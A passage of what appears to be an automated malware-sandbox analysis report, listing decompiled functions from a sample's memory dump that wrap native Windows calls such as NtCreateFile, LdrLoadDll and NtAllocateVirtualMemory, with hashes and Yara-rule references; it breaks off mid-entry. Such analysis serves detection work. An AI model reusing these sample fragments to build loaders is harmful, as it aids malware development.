                                                                                                                                                      Function 00419DA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: wKA
                                                                                                                                                      • API String ID: 823142352-3165208591
                                                                                                                                                      • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction ID: 3dc5bac7b2f0fe61b72982d3694b8f2312eed68ad843af8c69f32f3ae199a7d4
                                                                                                                                                      • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction Fuzzy Hash: 18F06CB2614109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                      0x0040acdc
                                                                                                                                                      0x0040acdf
                                                                                                                                                      0x0040ace4
                                                                                                                                                      0x0040ace9
                                                                                                                                                      0x0040acf3
                                                                                                                                                      0x0040acf8
                                                                                                                                                      0x0040acfb
                                                                                                                                                      0x0040acfd
                                                                                                                                                      0x0040ad05
                                                                                                                                                      0x0040ad0a
                                                                                                                                                      0x0040ad0a
                                                                                                                                                      0x0040ad11
                                                                                                                                                      0x0040ad19
                                                                                                                                                      0x0040ad1c
                                                                                                                                                      0x0040ad1e
                                                                                                                                                      0x0040ad32
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ad34
                                                                                                                                                      0x0040ad3a
                                                                                                                                                      0x0040acee
                                                                                                                                                      0x0040acee
                                                                                                                                                      0x0040acee

                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                      • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                                                                                                                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                      • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00419F2B(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t25;

				_pop(es);
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A950(_t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                      0x00419f2c
                                                                                                                                                      0x00419f33
                                                                                                                                                      0x00419f3f
                                                                                                                                                      0x00419f47
                                                                                                                                                      0x00419f69
                                                                                                                                                      0x00419f6d

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                      • Instruction ID: f41b3f2c5333d7f4cd888dcf998e8a17557808867dcfb89f421a74edea01d22c
                                                                                                                                                      • Opcode Fuzzy Hash: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                      • Instruction Fuzzy Hash: 83F052B2210218AFCB18DF89DC91EEB77ADAF88310F158209FA1C97241C630E910CBE4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                      0x00419f3f
                                                                                                                                                      0x00419f47
                                                                                                                                                      0x00419f69
                                                                                                                                                      0x00419f6d

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                      • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                                                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                      • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E00419E7A(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				_pop(_t15);
				asm("divps xmm6, [edx-0x74aafb60]");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}





                                                                                                                                                      0x00419e7a
                                                                                                                                                      0x00419e7b
                                                                                                                                                      0x00419e83
                                                                                                                                                      0x00419e86
                                                                                                                                                      0x00419e8f
                                                                                                                                                      0x00419e97
                                                                                                                                                      0x00419ea5
                                                                                                                                                      0x00419ea9

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                      • Instruction ID: b03c8a88f06c1c08a05908b4bfa387aef140f3031ec888633ef747f0f5e32563
                                                                                                                                                      • Opcode Fuzzy Hash: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                      • Instruction Fuzzy Hash: 59E0C275200104AFD710EFA9CC8AFE7BB68EF48360F06459AFA5C9B241C631F690C790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                      0x00419e83
                                                                                                                                                      0x00419e86
                                                                                                                                                      0x00419e8f
                                                                                                                                                      0x00419e97
                                                                                                                                                      0x00419ea5
                                                                                                                                                      0x00419ea9

                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                      • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                                                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                      • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00910048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00910078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0090FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
